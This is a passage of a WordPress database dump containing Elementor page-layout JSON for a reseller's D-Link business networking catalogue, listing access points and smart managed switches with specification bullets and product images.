WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"283\",\"right\":\"283\",\"bottom\":\"283\",\"left\":\"283\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"68\",\"right\":\"68\",\"bottom\":\"68\",\"left\":\"68\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7473,3396,'_elementor_version','2.5.14'),(7474,3396,'_elementor_edit_mode','builder'),(7477,3397,'_wp_page_template','template-fullwidth.php'),(7478,3397,'_elementor_template_type','post'),(7479,3397,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" 